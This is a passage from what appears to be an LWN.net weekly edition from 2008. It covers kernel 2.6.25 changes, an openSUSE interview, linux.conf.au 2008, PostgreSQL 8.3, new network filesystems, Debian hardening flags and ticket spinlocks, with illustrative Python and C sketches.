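print(queue.wake(WRITER))               # ['writer-1']
print(queue.wake(READER, max_wake=10))  # ['reader-1', 'reader-2']
```

A lock built this way can wake one writer, or all readers, without
disturbing the waiters of the other kind.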


Changes visible to kernel developers include: 


 A large number of SUNRPC symbols (rpc_* and
     rpcauth_*) have been changed to GPL-only exports.

 The x86 architecture merger continues, with quite a few files being
     coalesced.

 The "flatmem" and "discontigmem" memory models have been removed on
     the 64-bit x86 architecture; "sparsemem" is now used for all builds.

 The x86 spinlock implementation has been replaced with a "ticket
     spinlock" mechanism which provides fair FIFO behavior.  

 The fastcall function attribute didn't do anything on the x86
     architecture, so it has been removed.

 x86 has a new set of functions for easily manipulating page
     attributes.  They are:


     There is also a set of set_pages_* functions which take a
     struct page pointer rather than a beginning address.

 Early-boot debugging of x86 systems via the FireWire port is now
     supported. 

 Bidirectional command support has been added to the SCSI layer.

 There is a new process state called TASK_KILLABLE.  It is a
     blocked state similar to TASK_UNINTERRUPTIBLE, with the
     difference that a wakeup will happen upon delivery of a fatal signal.
     The idea is to allow (almost) uninterruptible sleeps, but to still
     allow the process to be killed outright - thus ending the problem of
     unkillable processes stuck in the "D" state.  There is a new set of
     functions for using this state: wait_event_killable(),
     schedule_timeout_killable(), mutex_lock_killable(),
     etc. 

 add_disk_randomness() has been unexported as there are no
     more in-tree users.

 pci_enable_device_bars() has been replaced by two
     more-specific functions: pci_enable_device_io() and
     pci_enable_device_mem(). 

 The high-resolution timer API has been augmented with:


     It will move the given timer's expiration forward past the current
     time as determined by the associated clock.

 The device structure now holds a pointer to a
     device_dma_parameters structure:


     These parameters are used by the DMA mapping layer (and the IOMMU
     mapping code in particular) to ensure that I/O operations are set up
     within the device's constraints.  The PCI layer supports this feature
     with two new functions:


     Drivers for devices with unusually strict DMA limitations should
     probably use these functions to ensure that those restrictions are
     respected. 
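
The "ticket spinlock" mentioned in the list above gets its FIFO fairness from
a simple idea: each would-be lock holder takes the next ticket number, then
waits until that number is being served.  The sketch below models the
bookkeeping in Python; it is single-threaded and purely illustrative, the
TicketLock class and its method names are hypothetical, and the real x86
implementation uses atomic instructions and busy-waiting rather than
anything shown here.

```python
class TicketLock:
    """Toy, single-threaded model of ticket-lock ordering."""

    def __init__(self):
        self.next_ticket = 0   # next ticket number to hand out
        self.now_serving = 0   # ticket currently allowed to hold the lock

    def take_ticket(self):
        """Join the queue; in a real lock this step would be atomic."""
        ticket = self.next_ticket
        self.next_ticket += 1
        return ticket

    def may_enter(self, ticket):
        """A real contender would spin until this becomes true."""
        return ticket == self.now_serving

    def unlock(self):
        """Pass the lock to the holder of the next ticket."""
        self.now_serving += 1


lock = TicketLock()
cpu_a = lock.take_ticket()
cpu_b = lock.take_ticket()
cpu_c = lock.take_ticket()

print(lock.may_enter(cpu_a), lock.may_enter(cpu_b))   # True False
lock.unlock()                                          # cpu_a releases
print(lock.may_enter(cpu_b), lock.may_enter(cpu_c))   # True False
```

Since tickets are served strictly in the order they were taken, no contender
can be passed over indefinitely by later arrivals.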


One thing which has not made it into 2.6.25 is the KGDB debugger for
the x86 architecture.  Amusingly, a linux.conf.au kernel mini-conf
discussion of "sneaking" KGDB past Linus proceeded for some time before the
participants noticed him standing in the back of the room listening to the
whole thing.  His current position is that
he won't pull it as part of 
the x86 tree, and he's still not much interested in the idea in general.


As of this writing, the merge window is still open and could stay that way
for as much as a week.  So more interesting code could still find its way
in through this merge window; stay tuned.

		An interview with the new openSUSE community manager


Joe 'Zonker' Brockmeier has joined the openSUSE
project as the openSUSE community manager.  We were pleased to have the
opportunity to ask Zonker a few questions about his new job.

Many LWN readers will remember that you were a regular contributor to LWN.
Any comments on what you have been up to between there and here?


Sure -- I stopped contributing to LWN when I took a full-time job with
OSTG/Linux.com (now the company known as SourceForge), and had to stop
freelancing. I was editorial director there for two years, and then
joined Linux Magazine as Editor-in-Chief. I've missed contributing to
LWN, but I still read LWN religiously.


As community manager will you be employed by Novell?


Yes.


Will you report to the openSUSE board?


I will be working with the board, but I report to Justin Steinman at
Novell. It's an unusual position, though, because my job is in large
part to be an advocate/ombudsman for the community.


openSUSE has adopted a Code of Conduct for
mailing lists and IRC.  As community manager, will policing this traffic be
a part of your job?


No -- we don't plan to have anyone actively policing the lists looking
for violations. Instead, the board is working on a policy to allow
community members to bring violations of the Code to the board to
decide whether disciplinary action should be needed. I hope that it's
something that won't be needed often, or at all -- and I don't think
it will be needed often.


How much control does Novell hold over openSUSE development?  Should there
be more or less control?  Is Novell allowing the community to make its own
decisions?


Right now, I'd say Novell is still guiding development pretty closely,
but would like the community to have a more prominent voice in the
direction of the development of openSUSE. I think the Fedora Project
is a pretty good model here, and I really think Max Spevack did a
great job in terms of helping Fedora come into its own.

The openSUSE Board appointed
last November is a step towards giving the community more control over
governance of the project.


This is a new position.  How much latitude will you have to define what the
community manager is/does?


Well, certain aspects of the job are already well-defined. For
example, a big part of the job will be traveling to conferences to
speak about openSUSE and also to organize an openSUSE conference. But
there's definitely some room to define the role as well.


OpenSUSE has a weekly newsletter which has come out almost weekly since
its inception last November.  Do you have any plans to get involved with
that?  Is it useful?


Yes, I do plan to contribute and help out with that where needed. I
think it's very useful -- communication is vital to the health of a
project like openSUSE. There are a lot of people contributing to
openSUSE, and without something like the weekly news, it would be easy
for contributors to lose track of what their colleagues are doing.
It's also important to spreading the news outside of the openSUSE
community so that other open source projects know what we're up to and
possibly find ways to collaborate and help reduce duplication of
effort between projects. Finally, I think it's a good way to show what
various contributors are doing and help recognize the contributors
that are having an impact on openSUSE.


What are your plans for the openSUSE community?


Over the long term, I'd like to help foster increased adoption of
openSUSE by a significant amount -- which means doing a better job of
promoting the distro, as well as communicating with potential users
and finding out what it is they need/want from openSUSE and working on
delivering that. (I'd encourage LWN readers to check out the alpha
builds for openSUSE 11.0 and give us feedback as we're working on the
final 11.0 release that should be done in July.)

I also want to work on developing a recognition system so that
contributors are acknowledged for their work, which we're doing more
on already -- we just announced our membership program for
contributors to be recognized.  I also want to make sure we're providing a
"roadmap" so that potential contributors have a clear path into the project
and know where to get started -- whether that's development, artwork,
documentation, quality assurance, advocating openSUSE, or supporting other
users.

Also, organize the first openSUSE conference, make sure openSUSE is
better represented at other conferences, and help provide potential
contributors with a roadmap to becoming contributors. I'd like to make
it as easy as possible for people to participate.

Finally, but not least -- I want to do what I can to help coordinate
increased cooperation between Linux distros and reduce duplication of
effort. While a lot of folks might like to portray the situation as
openSUSE vs. Fedora, Ubuntu, or any other distro, I don't see it that
way -- if someone is already happily using another distro, then I
consider that a win. I want to focus on attracting people who aren't
running Linux at all yet. There's plenty of work left to do, and I
hope we can do a better job of pooling our resources to attract those
people.


Is there anything you would like to add?


Just that I'd like to encourage LWN readers to visit
zonker.opensuse.org and news.opensuse.org for updates on the openSUSE
project, and to feel free to contact me (zonker@opensuse.org) with any
questions, suggestions, and comments related to openSUSE.


Thank you for taking the time to answer our questions.

		linux.conf.au 2008


linux.conf.au has an interesting structure which differentiates it from
most other events.  Every year, a completely new set of organizers takes
over the event, moves it to a new city, and puts its own stamp on it.
They have a great deal of freedom in how they run LCA, but there is still a
group of Linux Australia members and past organizers who keep an eye on
things and help ensure that the event does not run into problems.  The
result is a conference which has a lot of fresh energy every year, but
which is also reliably interesting.  Many attendees consider it to be one
of the best Linux events to be found anywhere in the world.


This year, LCA was held in Melbourne, Australia; the organizing team was
led by Donna Benjamin.  The now-familiar LCA formula was followed, but with
some small changes.  The tutorial day is no more, replaced by relatively
short tutorial sessions on each day.  The traditional auction for charity
was also gone this year; instead, a raffle (with Greg Kroah-Hartman's
2.6.22 contributor poster as the main prize) yielded some $1000 for a local
penguin refuge.  The raffle was certainly a lower-pressure, less
alcohol-fueled way of raising money, but
LCA without Rusty Russell as auctioneer just isn't quite the same.  That
quibble notwithstanding, LCA 2008 was an interesting, well-organized, and
well-attended event.  Ms. Benjamin and company have certainly upheld the
standards for this conference.


A number of LCA talks have been covered in separate LWN articles, and a few
more may yet follow.  This article will quickly review a few other high
points, as seen from your editor's perspective.  It's worth noting that
videos for almost all of the talks have been posted on the conference web
site.


Certainly one high point came on January 30, the day that LWN
celebrated its tenth anniversary.  The crowd sang a rousing - if not
entirely harmonious - version of "happy birthday" after Bruce Schneier's
keynote.  The following morning tea featured special LWN muffins; they
were, much to your editor's delight, of the intense chocolate variety.  It
is hard to imagine a better place or time to celebrate ten years of
LWN.


While most LCA presentations are quite technical in nature, there are
exceptions.  Australian lawyer Kimberlee Weatherall's talk on legal issues
was called "Stop in the name of law"; it covered a number of topics of
interest to a global audience.  Kimberlee, it's worth noting, was the
recipient of the "Rusty Wrench" award for service to the free software
community at last year's LCA in Sydney.


The Digital Millennium Copyright Act, she noted, is ten years old now.  At
this point, the debate on its anti-circumvention provisions is essentially
done, and anti-circumvention has won; she is not expecting to see any major
changes in countries which have adopted such laws.  The music industry may
be moving away from use of DRM, but "they were never very good at it
anyway."  DRM is still going strong in other areas, such as movies and
subscription television.


Similarly, the fight to end software patents is over, and we have lost.
There are incredible numbers of software patents issued every year; every
one of those patents represents a significant investment by its owner.  The
total amount of investment in these patents is huge; that amount of money
is almost impossible to displace.  It is also very hard to define what a
software patent really is; there are thousands of them in Europe, which
ostensibly does not allow software patents.  No matter how the rules are
written, lawyers will find a way around them.


What is happening on the patent front, instead, is a more constructive
engagement with the process.  Some reform is happening in the US, as a
result of the KSR decision and various attempts to mitigate the costs
associated with patents.  So the situation might improve slowly over time.


GPLv3 is out.  It now has to pass two tests: the market test (will projects
use it?) and any legal tests which might be brought.  Kimberlee expressed
some doubts on whether GPLv3 will really hold up in court, but did not
elaborate on them.


There is a new threat out there which we should not underestimate: the push
to force copyright enforcement duties onto ISPs.  This effort takes two
forms: getting "infringers" disconnected, and requiring ISPs to filter data
passing through their networks.  There are a lot of problems with either
approach, but that is not stopping the industry (and others, such as
anti-porn crusaders) from pushing hard for ISP responsibility.  This is a
fight to watch.


So what should the free software community do?  Not much, says Kimberlee,
except to keep coding.  The production of good code brings us allies with
money, and that's what we're going to need.  As long as we are successful,
people will go out of their way to protect us.  Keep doing what we do, and
things should come out OK.


Anthony Baxter is the Python release manager; he was also the keynote
speaker for the third day of the conference.  He is, to say the least, an
entertaining speaker, so this would be a good one to watch on video.  The
talk was about coming changes in Python, and Python 3.0 in
particular.  The 3.0 release, he says, is "the one where we break all of
your code."  It's the first backward-incompatible update of the language
(at least, if you don't deal in C extension modules).


There are a lot of changes to the language which your editor will not
repeat here; they are well documented on the Python web sites.  As noted,
many of these changes will cause existing code to break.  This is being
done, says Anthony, because the Python language is now 16 years old.  Like
all 16-year-olds, it has a number of annoying features.  It's time to clean
out a lot of accumulated cruft and get back to the minimal, "there is one
way to do it" vision that has always driven the language.


Perhaps what's most interesting is what won't be done.  The language
will not be bloated - it will stay Python.  There will be no braces; white
space will still be used to mark blocks of code.  The much-criticized
global interpreter lock will remain.  And, importantly, this will be an
incremental (if big) update - there will be no overall rewrite of the
interpreter.  The experience of certain other projects (namely Perl 6
and Mozilla) shows that total rewrites tend to be much longer, more painful
affairs than anybody might envision at the outset.


There will be migration tools, of course, and warnings built into the
forthcoming 2.6 release which will point out things that may cause
migration difficulties.  The 2.x series will be supported for some years
into the future.  And, says Anthony, there will be no Python 4.0 release.
This is their one chance to break everything and start over, and they plan
to get it right this time.


Dave Jones is the head maintainer for the Fedora kernel.  At LCA 2008 he
took a break from pointing out user-space problems and talked about "a day
in the life of a distribution kernel maintainer."  The real subject of the
talk was the process that the Fedora project goes through to put together
the kernels they ship.


There are currently three developers working on the Fedora kernel (Dave,
Chuck Ebbert, and Kyle McMartin), and "several dozen" working on the
RHEL kernels.  Most of the RHEL folks are doing backports of fixes,
drivers, etc. to the older kernels used by RHEL releases.


Once a kernel has been chosen for release, it's time to start adding
patches.  Some interesting numbers were put up at this point.  Red Hat
Linux 7 had 70 patches added to its 2.2.24 kernel.  That number went
slowly up, to the point where Fedora Core 6 had 191 patches.  There
are currently 63 patches added to the Fedora 8 kernel, though that may
grow over the life of this release.  By comparison, RHEL 5 is shipping
a 2.6.18 kernel with 1628 patches added to it - a very different world.


There are all kinds of patches which go into a distributor kernel.  These
include security technologies (ExecShield) which have not made it into the
mainline, changes to some default parameters, the silencing of certain
"scary messages" which tend to provoke lots of needless bug reports,
out-of-tree drivers, patches which help debug problems found in the field,
stuff which has been vetoed upstream, and more.  Then it's a matter of
putting out the package and dealing with the subsequent bug reports - lots of
them.


The closing ceremony included the traditional introduction of the organizer
for next year's event.  This event will go, for the first time ever, to
Hobart, Tasmania; see MarchSouth.org
for more information.  There is some information on what this team is
planning in the bid
document [1.6MB PDF]; your editor is intrigued by the following:
"The official Speakers' Dinner will be held at a mystery location
south of Hobart following a 40 minute river cruise on a high speed luxury
catamaran."  It's never too soon to get that talk proposal
together.


Finally, the last few LCA events have included the passing of the "Rusty
Wrench" award to somebody who has performed a great service to the
community.  Recipients so far are Rusty Russell (after whom the award is
named), Pia Waugh, and Kimberlee Weatherall.  The Rusty Wrench was not
awarded at LCA 2008, though.  It seems that, in the future,
the Rusty Wrench will be part of an extensive set of awards which will be
handed out at a separate "gala dinner" event held in the (Australian)
winter.  The awarding of the Rusty Wrench was a nice LCA feature which will
be missed, but, then, there are advantages to having another excuse to
visit Australia.

		PostgreSQL releases version 8.3


Version 8.3 of the
PostgreSQL DBMS was
announced on February 4, 2008:
"Today the PostgreSQL Global Development Group releases the long-awaited
version 8.3 of the most advanced open source database, which cements our
place as the best performing open source database."


Version 8.3 brings many new
features.
First on the list is the cleaning up of data type conversions.
This improvement may break backward compatibility with older
applications, but will ensure better data integrity in the future.


There are four new capabilities that aim to improve the consistency of
response times: Heap-Only Tuples (HOT) for speeding up access to
frequently updated data, asynchronous commits,
spread checkpoint autotuning and a just-in-time background writing strategy.
There have been numerous speed improvements including better recovery time
for the write ahead log, faster small-merge joins, faster LIKE/ILIKE
comparisons, improvements to searches using LIMIT, lazy XID assignment for
improving read-mostly database speed and function costing for faster query
planning.


Large database support improvements include synchronized scans for
multiple users, level 2 cache scan protection to prevent CPU thrashing
and reductions in the size of headers for variable size fields.
Windows users will benefit from new Visual C++ support and some code rewrites.


Administration improvements include output of logs to database-loadable
files, SSPI and GSSAPI support for Kerberos authentication, embeddable
GUC settings at function creation time, parallel autovacuum workers,
the pg_standby tool for configuring warm standby servers and a new ability
to specify the position of NULLs at the beginning or end of results.


Development improvements include API improvements to the full text search tool,
plan invalidation for clearing cached plans and automatically dropping
plans when tables are updated, and updatable cursors.


Data type enhancements include full support for the ANSI SQL:2003 XML spec,
support for 128 bit UUIDs, support for arrays of compound types and
support for ENUM columns with a defined ordered list of alternatives.
The ENUM enhancement eases the migration of applications from the
MySQL DBMS.


The PostgreSQL stored procedure language has a simplified syntax for row-returning functions and new support for scrollable cursors, which
allows procedures to perform complex row manipulations.


A number of new accessory tools are being released with PostgreSQL 8.3
including a multi-threaded connection pooler, a distributed, horizontally scaled table interface, an SNMP interface, a SELinux-based security extension,
a new GUI with debugging and step-through execution capabilities, a
new replicated query agent, a multi-master asynchronous replication system,
an integrated clustering tools project and an improved replication system.


For more information on the new features in PostgreSQL 8.3, see the
release notes.  The feature matrix gives a tabular view of features added
versus the version number.


In order to speed the next release up, the PostgreSQL team plans to
implement a new development plan for version 8.4:


In the 8.4 development cycle we would like to try a new style of
development, designed to keep the patch queue to a limited size and to
provide timely feedback to developers on the work they submit. To do
this we will replace the traditional 'feature freeze' with a series of
'commit fests' throughout the development cycle. The idea of commit
fests was discussed last October in -hackers, and it seemed to meet
with general approval. Whenever a commit fest is in progress, the
focus will shift from development to review, feedback and commit of
patches. Each fest will continue until all patches in the queue have
either been committed to the CVS repository, returned to the author
for additional work, or rejected outright, and until that has
happened, no new patches will be considered.


Version 8.3 represents a major step forward for PostgreSQL.
If the new development style bears fruit, the next major version
will come about more quickly.


		CRFS and POHMELFS


Performance, or lack thereof, has often been a knock against the
venerable Network File System (NFS), but no real competition has emerged.
NFS also has some serious flaws for programmers and users, with behavior
that is markedly different from that of local filesystems.  Both of these
problems are spurring the creation of new network filesystems, two of
which were announced in the last week.

The Coherent Remote File System (CRFS) was introduced last week at
linux.conf.au by Zach Brown of Oracle.  It uses BTRFS—pronounced
"butter-f-s"—as its storage on the server, rather than layering atop
any POSIX filesystem as NFS does.  According to Brown, BTRFS has a number
of important features that outweigh the inconvenience for users of getting
their data into a BTRFS volume.  The biggest is the ability to do compound
operations (creating or unlinking a file for example) in an atomic and
idempotent manner.


CRFS has a userspace daemon (crfsd) that talks to the BTRFS volume as well
as multiple clients.  The clients use the kernel VFS caching infrastructure
extensively and are thus implemented as kernel modules.  A user wishing
to access the underlying BTRFS volume on the server must mount it as a
CRFS volume; crfsd must have exclusive access to the BTRFS volume.  This is
also different from NFS, which will cooperate with local mounts of the
underlying filesystem.


The basic idea behind CRFS is to have clients cache as much of the
filesystem data as they can while using cache coherency protocols to reduce
the amount of network traffic that gets generated.  Clients
keep track of the cache state for each object they have stored, while the
server tracks the cache state of all objects that any client has.  The
messages between server and client consist of cache state transitions and
the data being transferred.


Data transfer in both directions is done using CRFS "item ranges".  CRFS
uses the BTRFS key scheme to represent objects (file data, directories,
directory entries, inodes, etc.) in the filesystem.
An item range is a contiguous section of the key space, specified by a
minimum and maximum key value as part of the message.  When the client is
filling its cache, it can request a particular key but also offer to take
other surrounding keys as part of the response; if the server sees those
keys in the BTRFS leaf node, it can send them along as well.
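
The item-range idea can be sketched in a few lines of C.  This is only an
illustration: the talk did not describe the CRFS wire format, so every name
below (demo_key, item_range, keys_in_range()) is invented, and the
three-part key compared field by field is an assumption about how BTRFS
orders its keys.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical key: assumed to sort by objectid, then type, then offset. */
struct demo_key {
    uint64_t objectid;
    uint8_t  type;
    uint64_t offset;
};

/* Hypothetical item range: a contiguous slice of the key space. */
struct item_range {
    struct demo_key min;
    struct demo_key max;
};

/* Three-way comparison: negative, zero, or positive like strcmp(). */
static int key_cmp(const struct demo_key *a, const struct demo_key *b)
{
    if (a->objectid != b->objectid)
        return a->objectid < b->objectid ? -1 : 1;
    if (a->type != b->type)
        return a->type < b->type ? -1 : 1;
    if (a->offset != b->offset)
        return a->offset < b->offset ? -1 : 1;
    return 0;
}

/* True if key k lies within [min, max], both ends inclusive. */
static bool range_contains(const struct item_range *r, const struct demo_key *k)
{
    return key_cmp(&r->min, k) <= 0 && key_cmp(k, &r->max) <= 0;
}

/* Server side: how many keys in this leaf would the client accept? */
static size_t keys_in_range(const struct demo_key *leaf, size_t n,
                            const struct item_range *r)
{
    size_t count = 0;

    for (size_t i = 0; i < n; i++)
        if (range_contains(r, &leaf[i]))
            count++;
    return count;
}

/* Usage: the client wants one key but offers to take its neighbors too. */
static void item_range_example(void)
{
    struct demo_key leaf[] = {
        { 256, 1, 0 }, { 256, 12, 0 }, { 256, 108, 0 }, { 257, 1, 0 },
    };
    struct item_range offered = { { 256, 12, 0 }, { 256, 255, UINT64_MAX } };

    assert(keys_in_range(leaf, 4, &offered) == 2);
}
```

The point of the wide range is that one round trip can fill the client's
cache with everything useful that happens to sit in the same leaf.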

CRFS currently shows something on the order of a 3x speedup over
asynchronous NFS mounts for a simple untar.  A comparison with synchronous
NFS mounts (where each write has to actually hit the remote disk) is not
sensible; there is a roughly 10x speed difference between the two types of
NFS mounts.  Brown has been working on CRFS for "about a year" and is
planning to release the code eventually.  Until that happens, the slides
[PDF] and video [Theora] from his talk, as well as a few postings to his
weblog, are the only sources of information about CRFS.

Another filesystem, one that aims to have a broader reach than
CRFS, is the Parallel Optimized Host Message Exchange
Layered File System (POHMELFS), announced in a linux-kernel posting by
Evgeniy Polyakov.  POHMELFS is meant to be a building block for a
distributed filesystem that would offer a multi-server architecture and
allow for disconnected filesystem operations.  Polyakov has only been
working on it for a month, so it is, at best, the start of a proof of concept. 


The POHMELFS vision is in some ways similar to CRFS in that the clients
will handle as much as possible locally, with minimal server interaction.
Like CRFS, client kernel modules talk to a server userspace daemon, using
cache coherency protocols to keep the data and metadata in sync.  For CRFS,
the coherency is not yet implemented, but is fleshed out to some extent,
while POHMELFS has quite a bit of fleshing out to do.  Unlike CRFS,
POHMELFS supports POSIX filesystems on the server side and the code is
available now.


There are some rather large hurdles to overcome in the POHMELFS vision, not
least of which is handling file IDs in separate client-side filesystems such
that they can be synchronized with the server.  The current code implements
a write-through cache version that creates objects on the server before
they are used in the client-side cache.  There is also an additional patch
that implements a hack to disable the writeback cache and use only the
client-side caching.  The latter is, not surprisingly, very fast, but not
terribly usable for multiple mounts of the filesystem.  Essentially,
Polyakov is showing the benefits of client-side caching, but in the context
of a broader scheme.


It will be a long time, if ever, before we see some descendant of either of
these filesystems in the kernel.  There is much work to be done, but they
are worth looking at to see where networking and distributed filesystems
may be headed.  For them to be useful outside of just the Linux world, with
something like the ubiquity of NFS, there would have to be some kind of
standardization followed by adoption by the major players.  That will take
a very long time.


		Security hardening for Debian


Making the programs in a distribution more resistant to exploits—a
process known as hardening—is a fairly common way to reduce the
attack surface for the distribution.  Many distributions have made
an effort in this area, with some adding in an overall security architecture, like
AppArmor for SUSE or SELinux for Red Hat and Fedora distributions.
Debian is currently looking at enabling some hardening features,
potentially throughout a large swath of packages that it distributes.  The
features being considered and the concerns raised provide an interesting
look at the tradeoffs.


A posting to
debian-devel-announce regarding hardening features for Lenny started
the conversation.  Those packages that are most susceptible—network services, packages that parse files from
untrusted sources, or those that have been the subject of a security
alert—should enable a set of security tools that will help deflect
attacks against them.  Various attacks rely upon certain characteristics of
Linux binaries that allow them to be exploited.  By altering the way the
binaries are built, those particular threats can be mitigated. 


The experimental hardening-wrapper
package makes enabling the various toolchain differences as easy as setting
DEB_BUILD_HARDENING=1 in the environment.  This will change
gcc, g++, and ld to use the desired flags when
building packages.  Each hardening feature can also be disabled separately
by setting DEB_BUILD_HARDENING_xyzzy=0 (where xyzzy is the name of
a hardening feature) if it causes build or performance problems for a
particular package.


The specific features enabled are described in the original posting and, in
more detail, in the Debian wiki entry for Hardening.  They are:

 - using -Wformat to catch printf() family calls that do not have a string
   literal for the format string, which can lead to problems if the argument
   came from an untrusted source and contains format specifiers.
 - using -D_FORTIFY_SOURCE=2 to validate glibc calls such as strcpy() when
   the buffer sizes are known at compile time, which can help stop buffer
   overflow attacks.
 - using -fstack-protector to thwart most stack smashing attacks.
 - creating Position Independent Executables (PIE), which facilitates using
   the Address Space Layout Randomization that is available in some
   kernels.  This makes it difficult for an attacker to have any knowledge
   of what the addresses for the program's sections will look like.
 - using ld -z relro to change certain sections to be read-only once ld
   has made its modifications while loading the program.  This can thwart
   attacks that try to overwrite the Global Offset Table (GOT).
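
As an illustration of the first item, here is a small sketch of the coding
pattern that the format-string warnings are meant to flush out.  The function
name is made up for this example; the risky call appears only in a comment,
and gcc's -Wformat-security option (used together with -Wformat) is the
warning that would flag it.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Risky pattern, shown only as a comment:
 *
 *     snprintf(out, outlen, untrusted);
 *
 * Here the untrusted text itself is interpreted as the format string, so
 * any "%s" or "%n" it contains is acted upon.
 */

/* Safer pattern: the format is a string literal, the input is only data. */
static int format_untrusted(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "%s", untrusted);
}

/* Usage: format specifiers in the input are copied, not interpreted. */
static void format_untrusted_example(void)
{
    char buf[32];
    int n = format_untrusted(buf, sizeof(buf), "100%n%s");

    assert(n == 7);
    assert(strcmp(buf, "100%n%s") == 0);
}
```

The fix costs nothing at run time; the hardening flags simply make the
compiler point out the places where it has not been applied.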


Many other distributions have already been down this path: Gentoo
has a page describing their hardened toolchain, Mark Cox of Red Hat has
a detailed look
at the evolution of security features in Red Hat and Fedora releases,
OpenSUSE has a page
about its security features, and so on.  There is a price to be paid in
binary size, execution speed, and cache behavior for these techniques, but
for most environments, where resources are not massively constrained, the
cost is worth it.  It makes new attacks against those systems more
difficult to design, which will make users and administrators sleep a
little better at night.


		Ticket spinlocks


Spinlocks are the lowest-level mutual exclusion mechanism in the Linux
kernel.  As such, they have a great deal of influence over the safety and
performance of the kernel, so it is not surprising that a great deal of
optimization effort has gone into the various (architecture-specific)
spinlock implementations.  That does not mean that all of the work has been
done, though; a patch merged for 2.6.25 shows that there is always more
which can be done.


On the x86 architecture, in the 2.6.24 kernel, a spinlock is represented by
an integer value.  A value of one indicates that the lock is available.  
The spin_lock() code works by decrementing the value (in a
system-wide atomic manner), then looking to see whether the result is
zero; if so, the lock has been successfully obtained.  Should, instead, the
result of the decrement operation be negative, the spin_lock() code
knows that the lock is owned by somebody else.  So it busy-waits ("spins")
in a tight loop until the value of the lock becomes positive; then it goes
back to the beginning and tries again.

Once the critical section has been executed, the owner of the lock releases
it by setting it to 1.
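
The algorithm just described can be approximated in user space with C11
atomics.  What follows is a sketch for illustration only, not the kernel's
x86 assembly; the type and function names (old_spinlock, old_spin_lock(),
and so on) are invented here.

```c
#include <assert.h>
#include <stdatomic.h>

/* Hypothetical stand-in for the 2.6.24-style lock: 1 means available. */
typedef struct {
    atomic_int slock;
} old_spinlock;

static void old_spin_init(old_spinlock *l)
{
    atomic_init(&l->slock, 1);
}

static void old_spin_lock(old_spinlock *l)
{
    for (;;) {
        /* fetch_sub returns the old value; 1 means our decrement hit zero. */
        if (atomic_fetch_sub(&l->slock, 1) == 1)
            return;
        /* Somebody else owns it: spin until the value becomes positive. */
        while (atomic_load(&l->slock) <= 0)
            ;
    }
}

static void old_spin_unlock(old_spinlock *l)
{
    assert(atomic_load(&l->slock) <= 0);  /* caller must hold the lock */
    atomic_store(&l->slock, 1);
}
```

Note that nothing here records who started waiting first; whichever
processor performs the next successful decrement wins.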

This implementation is very fast, especially in the uncontended case (which
is how things should be most of the time).  It also makes it easy to see
how bad the contention for a lock is - the more negative the value of the
lock gets, the more processors are trying to acquire it.  But there is one
shortcoming with this approach: it is unfair.  Once the lock is released,
the first processor which is able to decrement it will be the new owner.
There is no way to ensure that the processor which has been waiting the
longest gets the lock first; in fact, the processor which just released the
lock may, by virtue of owning that cache line, have an advantage should it
decide to reacquire the lock quickly.


One would hope that spinlock unfairness would not be a problem; usually, if
there is serious contention for locks, that contention is a performance
issue even before fairness is taken into account.  Nick Piggin recently
revisited this issue, though, after noticing:


	On an 8 core (2 socket) Opteron, spinlock unfairness is extremely
    	noticable, with a userspace test having a difference of up to 2x
    	runtime per thread, and some threads are starved or "unfairly"
    	granted the lock up to 1 000 000 (!)  times.


This sort of runtime difference is certainly undesirable.  But lock
unfairness can also create latency issues; it is hard to give latency
guarantees when the wait time for a spinlock can be arbitrarily long.


Nick's response
was a new spinlock implementation which he calls "ticket 
spinlocks."  Under the initial version of this patch, a spinlock became a
16-bit quantity, split into two bytes, "next" and "owner."


Each byte can be thought of as a ticket number.  If you have ever been to a
store where customers take paper tickets to ensure that they are served in
the order of arrival, you can think of the "next" field as being the number
on the next ticket in the dispenser, while "owner" is the number appearing
in the "now serving" display over the counter.

So, in the new scheme, the value of a lock is initialized (both fields) to
zero.  spin_lock() starts by noting the value of the lock, then
incrementing the "next" field - all in a single, atomic operation.  If the
value of "next" (before the increment) is equal to "owner," the lock has
been obtained and work can continue.  Otherwise the processor will spin,
waiting until "owner" is incremented to the right value.  In this scheme,
releasing a lock is a simple matter of incrementing "owner."
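
A user-space sketch of this scheme, again using C11 atomics, might look like
the following.  The names are invented for illustration, and there is one
simplification to keep in mind: the two fields are separate atomic bytes
here, so taking a ticket and reading "owner" are two operations rather than
the single atomic operation used by the actual patch.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

/* Hypothetical layout: two one-byte ticket counters. */
typedef struct {
    _Atomic uint8_t next;   /* next ticket in the dispenser */
    _Atomic uint8_t owner;  /* the "now serving" display */
} ticket_lock;

static void ticket_init(ticket_lock *l)
{
    atomic_init(&l->next, 0);
    atomic_init(&l->owner, 0);
}

static void ticket_acquire(ticket_lock *l)
{
    /* Take a ticket; fetch_add returns the value before the increment. */
    uint8_t mine = atomic_fetch_add(&l->next, 1);

    /* Spin until our number comes up. */
    while (atomic_load(&l->owner) != mine)
        ;
}

static void ticket_release(ticket_lock *l)
{
    /* Serve the next customer in line. */
    atomic_fetch_add(&l->owner, 1);
}

/* Usage: an uncontended acquire and release, step by step. */
static void ticket_example(void)
{
    ticket_lock l;

    ticket_init(&l);
    ticket_acquire(&l);                  /* ticket 0, owner 0: no spinning */
    assert(atomic_load(&l.next) == 1);
    assert(atomic_load(&l.owner) == 0);
    ticket_release(&l);                  /* now serving ticket 1 */
    assert(atomic_load(&l.owner) == 1);
}
```

Because each waiter spins on its own ticket number, the lock is handed over
strictly in order of arrival.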


The implementation described above does have one small disadvantage in that
it limits the number of processors to 256 - any more than that, and a
heavily-contended lock could lead to multiple processors thinking they had
the same ticket number.  Needless to say, the resulting potential for
mayhem is not something which can be tolerated.  But the 256-processor
limit is an unwelcome constraint for those working on large systems, which
already have rather more processors than that.  So the add-on "big
ticket" patch - also merged for 2.6.25 - uses 16-bit values when the
configured maximum number of processors exceeds 256.  That raises the
maximum system size to 65536 processors - who could ever want more than
that?
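
The arithmetic behind these limits is simple wrap-around.  The helper below
is a made-up illustration, not anything from the patch: it computes which
ticket number the Nth arrival would receive for a given ticket width.

```c
#include <assert.h>

/* Ticket handed to the Nth arrival (counting from zero) with 'bits'-wide
 * ticket fields; the counter simply wraps when it overflows. */
static unsigned ticket_number(unsigned long arrival, unsigned bits)
{
    return (unsigned)(arrival & ((1ul << bits) - 1ul));
}

static void ticket_wrap_example(void)
{
    /* 8-bit tickets: arrival 256 gets the same number as arrival 0. */
    assert(ticket_number(0, 8) == ticket_number(256, 8));
    /* 16-bit tickets keep them distinct ... */
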